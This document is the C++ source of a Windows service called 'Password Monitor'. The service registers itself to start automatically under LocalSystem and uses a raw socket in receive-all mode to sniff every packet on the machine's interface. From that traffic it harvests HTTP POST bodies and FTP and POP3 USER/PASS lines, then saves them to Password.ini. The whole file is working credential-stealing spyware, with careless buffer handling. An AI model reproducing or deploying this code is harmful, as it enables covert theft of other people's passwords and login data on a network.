// monitorservice.cpp : 定义控制台应用程序的入口点。
//
//Author: Anish C.V.
//EMail : cv_anish@hotmail.com
#include "stdafx.h"
#include <Winsock2.h>
#include "Windows.h"
#include "Winsvc.h"
#include "mstcpip.h"
#include "ws2tcpip.h"
#pragma comment(lib,"Advapi32.lib")
#pragma comment(lib,"Ws2_32.lib")
// One slot of the producer/consumer ring `Buffer`: CheckTcp fills a slot, ThreadProc drains it.
typedef struct tagBuff {
DWORD dwFlag; // FLAG value (HTTP/FTP/SMTP/POP3) describing the queued payload
DWORD SrcIP; // IPv4 source address copied from the IP header (only written for FTP and POP3 slots)
DWORD DstIP; // IPv4 destination address (only written for FTP and POP3 slots)
DWORD dwLen; // number of bytes the producer copied into cBuffer
BYTE cBuffer[1024]; // copied TCP payload bytes
}BUFF,*PBUFF;
#define BUFFER_MAX 1024 // ring slot count; also the maximum count of g_hSemaphore (see ServiceMain)
BUFF Buffer[BUFFER_MAX]; // ring of captured payloads: written at nTailer (CheckTcp), read at nHeader (ThreadProc)
#define BUFFER_SIZE 65536 // size of the raw receive buffer, one IP datagram at most
char RecvBuf [BUFFER_SIZE]; // filled by recv() in ServiceMain and handed to DecodeEthPkt_data
// Protocol tag stored in BUFF::dwFlag; ThreadProc switches on it to decide how a slot is recorded.
typedef enum tagFlag{
HTTP, // HTTP POST request (destination port 80 or 8080)
FTP, // FTP control channel (destination port 21)
SMTP, // declared but never queued by CheckTcp; ThreadProc ignores it
POP3 // POP3 (destination port 110)
}FLAG;
static HANDLE g_hSemaphore=NULL; // counts filled ring slots: released by CheckTcp, waited on by ThreadProc
static HANDLE g_hThread=NULL; // consumer thread running ThreadProc; created at most once in ServiceMain
static int nHeader=0; // ring read index (consumer side), always taken modulo BUFFER_MAX
static int nTailer=0; // ring write index (producer side), always taken modulo BUFFER_MAX
//
// Ip header
//
// IPv4 header as it appears on the wire (20 bytes without options).
// Multi-byte fields hold the bytes as received, i.e. network byte order.
typedef struct _IP_HEADER
{
union
{
BYTE VersionAndHeaderLength; // Version 4 bit, Header Length 4 bit * 4
struct
{
// Bit-field order puts HeaderLength in the low nibble, which matches the wire layout
// on compilers that allocate bit-fields from the low-order bits (MSVC on x86).
BYTE HeaderLength : 4; // header length in 32-bit words (see HEADER_LENGTH_MULTIPLE)
BYTE Version : 4; // IP version, 4 for IPv4
};
};
BYTE TypeOfService;
WORD DatagramLength; // total length of header plus payload
WORD Id;
WORD FlagsAndFragmentOffset; // Flags 3 bit, Fragment Offset 13 bit
BYTE TimeToLive;
BYTE Protocol; // transport protocol, compared against the PROTOCOL_* constants below
WORD CheckSum;
BYTE SourceIp[4]; // raw address bytes; CheckTcp reinterprets them as one 32-bit value
BYTE DestinationIp[4];
} IP_HEADER, *PIP_HEADER;
#define IP_HEADER_LENGTH 20
// Synthetic protocol codes used nowhere in this file; kept for the callers that may exist elsewhere.
#define PROTOCOL_INVALID_IP 0xFF
#define PROTOCOL_INVALID_TCP 0xFE
#define PROTOCOL_INVALID_UDP 0xFD
#define PROTOCOL_INVALID_ICMP 0xFC
// IANA protocol numbers matched in DecodeEthPkt_data.
#define PROTOCOL_TCP 0x06
#define PROTOCOL_UDP 0x11
#define PROTOCOL_ICMP 0x01
#define PROTOCOL_IGMP 0x02
#define HEADER_LENGTH_MULTIPLE 4 // header-length fields count 32-bit words
// Helpers for decoding the packed fields above; only HEADER_LENGTH_MULTIPLE is used in this file.
#define GET_IP_VERSION(verlen) ((verlen & 0xF0) >> 4)
#define GET_IP_HEADER_LENGTH(verlen) ((verlen & 0x0F) * HEADER_LENGTH_MULTIPLE)
#define GET_IP_FLAGS(ffo) ((ffo & 0xE000) >> 13)
#define GET_IP_FRAGMENT_OFFSET(ffo) (ffo & 0x1FFF)
//
// Tcp Header
//
// TCP header as it appears on the wire (20 bytes without options).
// Ports are read with ntohs() in CheckTcp; the flag bits are read through the bit-fields.
typedef struct _TCP_HEADER
{
WORD SourcePort;
WORD DestinationPort;
DWORD SeqNumber;
DWORD AckNumber;
union
{
WORD LenAndCodeBits; // Header length 4 bit, Reserved 6 bit, Code Bits 6 bit
struct
{
WORD Reserved1 : 8;
WORD TcpCode : 6; // all six code bits as one value
WORD Reserved2 : 2;
};
struct
{
// Same 16 bits split into individual flags; CheckTcp tests TcpFin/TcpRst/TcpSyn.
WORD Reserved3 : 4;
WORD HeaderLength : 4; // header length in 32-bit words (not consulted by this file)
WORD TcpFin : 1;
WORD TcpSyn : 1;
WORD TcpRst : 1;
WORD TcpPsh : 1;
WORD TcpAck : 1;
WORD TcpUrg : 1;
WORD Reserved4 : 2;
};
};
WORD Window;
WORD CheckSum;
WORD UrgentPointer;
} TCP_HEADER, *PTCP_HEADER;
#define TCP_HEADER_LENGTH 20
// Decoders for LenAndCodeBits; unused in this file.
#define GET_TCP_HEADER_LENGTH(lcb) (((lcb & 0xF000) >> 12) * HEADER_LENGTH_MULTIPLE)
#define GET_TCP_CODE_BITS(lcb) (lcb & 0x003F)
//
// Udp Header
//
// UDP header (8 bytes). Only passed through to CheckUdp, which does nothing with it.
typedef struct _UDP_HEADER
{
WORD SourcePort;
WORD DestinationPort;
WORD Length; // including this header
WORD CheckSum;
} UDP_HEADER, *PUDP_HEADER;
#define UDP_HEADER_LENGTH 8
//
// Icmp Header
//
// ICMP echo-style header. Declared for completeness; DecodeEthPkt_data never dispatches ICMP.
typedef struct _ICMP_HEADER
{
BYTE Type;
BYTE Code; // type sub code
WORD CheckSum;
WORD ID;
WORD Seq;
} ICMP_HEADER, *PICMP_HEADER;
#define ICMP_HEADER_LENGTH 8
// Classification values for ICMP traffic; unused in this file.
#define ICMP_NORMAL 0
#define ICMP_REQUEST 1
#define ICMP_RESPONSE 2
SERVICE_STATUS m_ServiceStatus; // status record reported to the SCM by ServiceMain and ServiceCtrlHandler
SERVICE_STATUS_HANDLE m_ServiceStatusHandle; // returned by RegisterServiceCtrlHandler in ServiceMain
BOOL bRunning=true; // cleared on SERVICE_CONTROL_STOP; no loop in this file reads it
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv);
void WINAPI ServiceCtrlHandler(DWORD Opcode);
BOOL InstallService();
BOOL DeleteService(); // zero-argument overload; the Win32 DeleteService(SC_HANDLE) is still reachable by overload
// UDP hook called from DecodeEthPkt_data. Intentionally empty: UDP datagrams are discarded.
//   pUdpHeader - start of the UDP header (unused)
//   dwLen      - length computed by the caller (unused)
void CheckUdp(PUDP_HEADER pUdpHeader,DWORD dwLen)
{
}
// Inspect one TCP segment and, for a few destination ports, queue its payload for ThreadProc.
//   pTcpHeader - start of the TCP header. The code assumes the IP header lies exactly
//                sizeof(IP_HEADER) bytes before it and the payload exactly sizeof(TCP_HEADER)
//                bytes after it (a 20-byte header, options not accounted for).
//   dwLen      - payload length as computed by DecodeEthPkt_data; stored in the slot and used
//                as the memcpy length.
// Port 80/8080: a payload containing "POST" and "HTTP/1" is queued with dwFlag=HTTP.
// Port 110:     a payload containing "USER" or "PASS" is queued with dwFlag=POP3 plus src/dst IP.
// Port 21:      same test as port 110, queued with dwFlag=FTP.
// Every queued slot advances nTailer and releases g_hSemaphore by one so ThreadProc wakes up.
// Segments carrying FIN, RST or SYN are skipped without inspection.
void CheckTcp(PTCP_HEADER pTcpHeader,DWORD dwLen)
{
if (pTcpHeader->TcpFin || pTcpHeader->TcpRst||pTcpHeader->TcpSyn)
{
return;
}
TCHAR* szTemp=NULL;
// Ports are on the wire in network byte order; convert before comparing.
switch(ntohs(pTcpHeader->DestinationPort))
{
case 80:
case 8080:
szTemp=(char*)pTcpHeader+sizeof(TCP_HEADER); // payload follows a 20-byte header
if (strstr(szTemp,"POST")&&strstr(szTemp,"HTTP/1")){
Buffer[nTailer].dwFlag=HTTP;
Buffer[nTailer].dwLen=dwLen;
memcpy(Buffer[nTailer].cBuffer,szTemp,dwLen);
nTailer=(nTailer+1) % BUFFER_MAX;
ReleaseSemaphore( g_hSemaphore, // handle to semaphore
1, // increase count by one
NULL);
}
break;
case 110:
szTemp=(char*)pTcpHeader+sizeof(TCP_HEADER);
if (strstr(szTemp,"USER")||strstr(szTemp,"PASS")){
// Step back over the IP header to pick up the addresses for this slot.
PIP_HEADER pIpHeader=(PIP_HEADER)((BYTE*)pTcpHeader-sizeof(IP_HEADER));
Buffer[nTailer].SrcIP=*((int*)pIpHeader->SourceIp);
Buffer[nTailer].DstIP=*((int*)pIpHeader->DestinationIp);;
Buffer[nTailer].dwFlag=POP3;
Buffer[nTailer].dwLen=dwLen;
memcpy(Buffer[nTailer].cBuffer,szTemp,dwLen);
nTailer=(nTailer+1) % BUFFER_MAX;
ReleaseSemaphore(
g_hSemaphore, // handle to semaphore
1, // increase count by one
NULL);
}
break;
case 21:
szTemp=(char*)pTcpHeader+sizeof(TCP_HEADER);
if (strstr(szTemp,"USER")||strstr(szTemp,"PASS")){
PIP_HEADER pIpHeader=(PIP_HEADER)((BYTE*)pTcpHeader-sizeof(IP_HEADER));
Buffer[nTailer].SrcIP=*((int*)pIpHeader->SourceIp);
Buffer[nTailer].DstIP=*((int*)pIpHeader->DestinationIp);;
Buffer[nTailer].dwFlag=FTP;
Buffer[nTailer].dwLen=dwLen;
memcpy(Buffer[nTailer].cBuffer,szTemp,dwLen);
nTailer=(nTailer+1) % BUFFER_MAX;
ReleaseSemaphore(
g_hSemaphore, // handle to semaphore
1, // increase count by one
NULL);
}
break;;
default:
break;
}
}
// Dispatch one received IP datagram to the per-protocol checker.
//   pkt - buffer as delivered by recv() in ServiceMain. Despite the name there is no Ethernet
//         frame in front: the Ethernet offset is commented out, so pkt is read as the IP header.
// Datagrams whose header-length field is zero are dropped. TCP and UDP are forwarded with a
// length of DatagramLength - sizeof(TCP_HEADER) (the same expression is used for both);
// every other protocol is ignored.
void DecodeEthPkt_data( u_char * pkt)
{
WORD EthernetFrameType; // unused
WORD LengthCount;
PIP_HEADER pIpHeader;
pIpHeader = (PIP_HEADER)(pkt/*+sizeof(EHTERNET_FRAME)*/);
LengthCount = pIpHeader->HeaderLength * HEADER_LENGTH_MULTIPLE; // header length in bytes
if(LengthCount == 0){
//dprintf(("LengthCount == 0"));
return ;
}
switch(pIpHeader->Protocol)
{
case PROTOCOL_TCP:
// parse the TCP header
CheckTcp((PTCP_HEADER)(pkt+/*sizeof(EHTERNET_FRAME)+*/sizeof(IP_HEADER)),pIpHeader->DatagramLength-sizeof(TCP_HEADER));
return ;
case PROTOCOL_UDP:
// parse the UDP header
CheckUdp((PUDP_HEADER)(pkt+/*sizeof(EHTERNET_FRAME)+*/sizeof(IP_HEADER)),pIpHeader->DatagramLength-sizeof(TCP_HEADER));
return ;
default:
break;
}
return;
}//DecodeEthPkt_data
// Consumer thread: drains the Buffer ring and records each slot in Password.ini through
// WritePrivateProfileString. The file name has no path, so it is resolved by the INI API
// (a pathless name is looked up in, and created in, the Windows directory).
//   lParam - unused.
// Each iteration waits up to 2 ms on g_hSemaphore. On WAIT_OBJECT_0 the slot at nHeader is
// handled according to dwFlag:
//   HTTP  - section = Host header + request path, key = POST body cut at Content-Length,
//           value = Referer header (or "HTTP" when absent). If any marker is missing the
//           function returns 1, which ends this thread.
//   FTP / POP3 - section = destination IP as text, key = first line of the payload,
//           value = "FTP" / "POP3".
//   SMTP  - ignored.
// nHeader is advanced after each handled slot. The outer loop has no exit, so the trailing
// return TRUE is not reached.
DWORD ThreadProc(LPVOID lParam)
{
DWORD dwWaitResult;
while (TRUE) {
dwWaitResult = WaitForSingleObject(
g_hSemaphore, // handle to semaphore
2);
switch (dwWaitResult)
{
// a slot is available in the queue (the semaphore counts filled slots)
case WAIT_OBJECT_0:
switch(Buffer[nHeader].dwFlag){
case HTTP:
{
// strstr() yields NULL on a miss; the "+5" then gives 5, which the next test checks for.
TCHAR* szURL=strstr((char*)Buffer[nHeader].cBuffer,"POST ")+5;
if ((int)szURL==0005) {
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR* szHTTP=strstr(szURL,"HTTP/");
if (szHTTP==NULL) {
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR cURL[1024];
ZeroMemory(cURL,sizeof cURL);
_tcsncpy(cURL,szURL,szHTTP-szURL); // request path up to the "HTTP/" marker
// Same NULL+offset sentinel pattern as above (6 == strlen("Host: ")).
TCHAR* szHost=strstr((char*)Buffer[nHeader].cBuffer,"Host: ")+6;
if ((int)szHost==0006) {
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR* szCRLN=strstr(szHost,"\r\n");
if (szCRLN==NULL) {
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR cHost[1024];
ZeroMemory(cHost,sizeof cHost);
_tcsncpy(cHost,szHost,szCRLN-szHost);
_tcscat(cHost,cURL); // cHost becomes the INI section name: host followed by path
// Body starts after the blank line; Content-Length decides how much of it is kept.
TCHAR* szPostData=strstr((char*)Buffer[nHeader].cBuffer,"\r\n\r\n")+4;
TCHAR* szContentLen=strstr((char*)Buffer[nHeader].cBuffer,"Content-Length: ")+16;
if((int)szPostData==4||(int)szContentLen==16){
nHeader=(nHeader+1)%BUFFER_MAX;
return 1;
}
TCHAR* szRefer=strstr((char*)Buffer[nHeader].cBuffer,"Referer: ")+9;
TCHAR cRefer[1024];
if((int)szRefer!=9){
ZeroMemory(cRefer,sizeof cRefer);
int i=0;
while(szRefer[i]!='\r'){ // copy the Referer value up to end of line
cRefer[i]=szRefer[i];
i++;
}
}
else
_tcscpy(cRefer,"HTTP"); // no Referer header: use a fixed value
int nLen;
sscanf(szContentLen,"%d",&nLen);
szPostData[nLen]=0; // terminate the body at the declared length
WritePrivateProfileString(cHost,szPostData,cRefer,"Password.ini");
nHeader=(nHeader+1)%BUFFER_MAX;
}
break;
case FTP:
{
// Keep only the first line of the payload.
TCHAR* szCRLN=strstr((char*)Buffer[nHeader].cBuffer,"\r\n");
if (szCRLN!=NULL) {
*szCRLN=0;
}
WritePrivateProfileString(inet_ntoa(*(struct in_addr *)&Buffer[nHeader].DstIP),
(char*)Buffer[nHeader].cBuffer,"FTP","Password.ini");
nHeader=(nHeader+1)%BUFFER_MAX;
}
break;
case SMTP:
break;
case POP3:
TCHAR* szCRLN=strstr((char*)Buffer[nHeader].cBuffer,"\r\n");
if (szCRLN!=NULL) {
*szCRLN=0;
}
WritePrivateProfileString(inet_ntoa(*(struct in_addr *)&Buffer[nHeader].DstIP),
(char*)Buffer[nHeader].cBuffer,"POP3","Password.ini");
nHeader=(nHeader+1)%BUFFER_MAX;
break;
}
break;
// nothing queued within the 2 ms wait; go round again
case WAIT_TIMEOUT:
break;
}
}
return TRUE;
}
// Process entry point.
//   "-i"   installs the service (InstallService) and prints the outcome.
//   "-d"   removes the service (DeleteService) and prints the outcome.
//   other  prints the usage text. Because the "-d" test is an independent if/else, "-i"
//          also falls into the usage branch after installing.
//   no args: run as a service under the name "Password Monitor" via StartServiceCtrlDispatcher.
// Always returns 0.
int main(int argc, char* argv[])
{
if(argc>1)
{
if(strcmp(argv[1],"-i")==0)
{
if(InstallService())
printf("\n\nService Installed Sucessfully\n");
else
printf("\n\nError Installing Service\n");
}
if(strcmp(argv[1],"-d")==0)
{
if(DeleteService())
printf("\n\nService UnInstalled Sucessfully\n");
else
printf("\n\nError UnInstalling Service\n");
}
else
{
printf("\n\nUnknown Switch Usage\n\nFor Install use MonitorService -i\n\nFor UnInstall use MonitorService -d\n");
}
}
else
{
// Service name must match the one used by InstallService / RegisterServiceCtrlHandler.
SERVICE_TABLE_ENTRY DispatchTable[]={{"Password Monitor",ServiceMain},{NULL,NULL}};
StartServiceCtrlDispatcher(DispatchTable);
}
return 0;
}
// Service entry point invoked by the SCM. Registers the control handler, creates the
// semaphore and the consumer thread, opens a raw socket in receive-all mode on the first
// local address, and then loops forever handing every received datagram to
// DecodeEthPkt_data. Each setup failure returns silently without updating the SCM status.
//   argc/argv - service arguments, unused.
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
DWORD status; // unused
DWORD specificError; // unused
m_ServiceStatus.dwServiceType = SERVICE_WIN32;
m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
m_ServiceStatus.dwWin32ExitCode = 0;
m_ServiceStatus.dwServiceSpecificExitCode = 0;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
m_ServiceStatusHandle = RegisterServiceCtrlHandler("Password Monitor",ServiceCtrlHandler);
// As written, SERVICE_RUNNING is only assigned on the branch where registration returned a null handle.
if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
if (!SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus)) return;
g_hSemaphore = CreateSemaphore(
NULL, // no security attributes
0, // initial count
BUFFER_MAX, // maximum count
NULL); // unnamed semaphore
DWORD dwThread;
if (g_hThread==0) {
g_hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ThreadProc,NULL,0,&dwThread);
}
WSADATA WSAData;
BOOL flag = true;
int nTimeout = 1000; // unused
char LocalName[16];
SOCKADDR_IN addr_in;
struct hostent *pHost;
SOCKET sock;
// initialise Winsock (version 2.2)
if (WSAStartup(MAKEWORD(2, 2), &WSAData) != 0)return ;
// create the raw socket
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == INVALID_SOCKET) return ;
// ask for the IP header to be included in received data
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&flag, sizeof(flag)) == SOCKET_ERROR)
return ;
// get the local host name
if (gethostname((char*)LocalName, sizeof(LocalName)) == SOCKET_ERROR)return ;
// resolve it to the local IP address
if ((pHost = gethostbyname((char*)LocalName)) == NULL) return ;
addr_in.sin_addr = *(in_addr *)pHost->h_addr_list[0]; //IP, first address only
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(55555);
// bind sock to the local address
if (bind(sock, (PSOCKADDR)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)return ;
DWORD dwValue = 1;
// switch the raw socket to SIO_RCVALL so that every IP packet on the interface is delivered
if (ioctlsocket(sock, SIO_RCVALL, &dwValue) != 0) return ;
// Capture loop; bRunning is never consulted, so only process termination ends it.
while (true)
{
int ret = recv(sock, RecvBuf, BUFFER_SIZE, 0);
if (ret > 0)
{
DecodeEthPkt_data((BYTE*)RecvBuf) ;
}
}
return;
}
// SCM control callback registered in ServiceMain.
//   Opcode - SERVICE_CONTROL_* code.
// PAUSE and CONTINUE only update the local status record (it is not re-sent to the SCM).
// STOP reports SERVICE_STOPPED and clears bRunning; nothing in this file reads bRunning.
void WINAPI ServiceCtrlHandler(DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_PAUSE:
m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
m_ServiceStatus.dwWin32ExitCode = 0;
m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
m_ServiceStatus.dwCheckPoint = 0;
m_ServiceStatus.dwWaitHint = 0;
SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus);
bRunning=false;
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
return;
}
// Register this executable with the SCM as the auto-start, own-process service
// "Password Monitor" running under the default (LocalSystem) account.
// Returns true on success. Note: schSCManager is not closed before returning on any path.
BOOL InstallService()
{
char strDir[1024];
SC_HANDLE schSCManager,schService;
GetModuleFileName(NULL,strDir,sizeof strDir); // binary path = the running executable
schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL) return false;
LPCTSTR lpszBinaryPathName=strDir;
schService = CreateService(schSCManager,"Password Monitor","Password Monitor", // service name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_WIN32_OWN_PROCESS, // service type
SERVICE_AUTO_START, // start type
SERVICE_ERROR_NORMAL, // error control type
lpszBinaryPathName, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL); // no password
if (schService == NULL) return false;
CloseServiceHandle(schService);
return true;
}
// Remove the "Password Monitor" service from the SCM.
// This zero-argument overload wraps the Win32 DeleteService(SC_HANDLE); the unqualified
// call below resolves to the API function by overload. Returns true on success.
// Note: schSCManager is not closed before returning on any path.
BOOL DeleteService()
{
SC_HANDLE schSCManager;
SC_HANDLE hService;
schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (schSCManager == NULL) return false;
hService=OpenService(schSCManager,"Password Monitor",SERVICE_ALL_ACCESS);
if (hService == NULL) return false;
if(DeleteService(hService)==0) return false; // Win32 DeleteService(SC_HANDLE)
if(CloseServiceHandle(hService)==0)
return false;
else
return true;
}